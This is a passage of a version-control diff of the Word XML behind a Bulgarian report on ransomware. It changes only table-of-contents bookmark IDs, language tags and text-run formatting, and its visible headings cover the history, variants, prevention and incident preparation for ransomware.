-          <w:hyperlink w:anchor="_Toc223339504" w:history="1">
+          <w:hyperlink w:anchor="_Toc223341830" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1552,7 +1616,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223339504 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341830 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1614,7 +1678,7 @@
           <w:rFonts w:eastAsia="Aptos"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc223339493"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc223341818"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Aptos"/>
@@ -1782,7 +1846,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc223339494"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc223341819"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">История на </w:t>
@@ -1951,7 +2015,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc223339495"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc223341820"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Еволюция на </w:t>
@@ -1978,7 +2042,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc223339496"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc223341821"/>
       <w:r>
         <w:t xml:space="preserve">Ранна фаза на </w:t>
       </w:r>
@@ -2226,7 +2290,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc223339497"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc223341822"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -2637,7 +2701,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc223339498"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc223341823"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3093,7 +3157,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc223339499"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc223341824"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3261,7 +3325,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc223339500"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc223341825"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3483,7 +3547,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc223339501"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc223341826"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Стратегии и защита от </w:t>
@@ -3537,7 +3601,7 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc223339502"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc223341827"/>
       <w:r>
         <w:t xml:space="preserve">Подготовка за </w:t>
       </w:r>
@@ -3725,7 +3789,7 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="10" w:name="_Toc223339503"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc223341828"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Превенция </w:t>
@@ -3742,10 +3806,10 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:t>уязвимости</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="10"/>
-      <w:r>
-        <w:t>уязвимости</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3991,6 +4055,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:drawing>
@@ -4102,6 +4167,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -4187,6 +4253,7 @@
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
+      <w:bookmarkStart w:id="11" w:name="_Toc223341829"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Компрометирани </w:t>
@@ -4197,6 +4264,7 @@
         </w:rPr>
         <w:t>credentials</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4220,7 +4288,7 @@
         <w:br w:type="page"/>
       </w:r>
     </w:p>
-    <w:bookmarkStart w:id="11" w:name="_Toc223339504" w:displacedByCustomXml="next"/>
+    <w:bookmarkStart w:id="12" w:name="_Toc223341830" w:displacedByCustomXml="next"/>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
@@ -4248,7 +4316,7 @@
           <w:r>
             <w:t>Цитирани източници</w:t>
           </w:r>
-          <w:bookmarkEnd w:id="11"/>
+          <w:bookmarkEnd w:id="12"/>
         </w:p>
         <w:p>
           <w:pPr>
@@ -6008,6 +6076,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -487,7 +487,7 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -499,7 +499,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc223341818" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346797" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -527,7 +527,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341818 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346797 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -567,10 +567,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223341819" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346798" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -605,7 +605,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341819 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346798 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -645,10 +645,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223341820" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346799" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -683,7 +683,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341820 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346799 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -724,10 +724,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223341821" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346800" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -739,34 +739,34 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ранна фаза на </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">Ранна фаза на </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -777,7 +777,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341821 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346800 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -818,10 +818,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223341822" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346801" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -833,49 +833,49 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> използващ </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>RSA</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> криптиране</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> използващ </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>RSA</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> криптиране</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -886,7 +886,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341822 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346801 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -927,10 +927,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223341823" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346802" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -943,27 +943,27 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Spear phishing Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Spear phishing Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -974,7 +974,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341823 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346802 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1015,10 +1015,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223341824" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346803" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1031,49 +1031,49 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> в </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Android </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>базирани системи</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> в </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Android </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>базирани системи</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1084,7 +1084,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341824 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346803 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1125,10 +1125,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223341825" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346804" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1140,42 +1140,42 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t xml:space="preserve">Big Game Hunting (BGH) </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">и </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Big Game Hunting (BGH) </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">и </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1186,7 +1186,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341825 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346804 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1226,10 +1226,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223341826" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346805" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1264,7 +1264,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341826 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346805 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1305,10 +1305,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223341827" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346806" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1320,41 +1320,41 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">Подготовка за </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> инциденти</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">Подготовка за </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> инциденти</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1365,7 +1365,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341827 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346806 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1406,10 +1406,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223341828" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346807" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1422,7 +1422,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:val="en-US"/>
+                <w:lang w:eastAsia="bg-BG"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1431,7 +1431,21 @@
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Превенция на интернет-достъпни уязвимости</w:t>
+              <w:t>Превенция на инт</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>е</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>рнет-достъпни уязвимости</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1452,7 +1466,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341828 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346807 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1493,10 +1507,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223341829" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346808" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1508,34 +1522,34 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">Компрометирани </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>credentials</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">Компрометирани </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>credentials</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1546,7 +1560,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341829 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346808 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1586,10 +1600,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
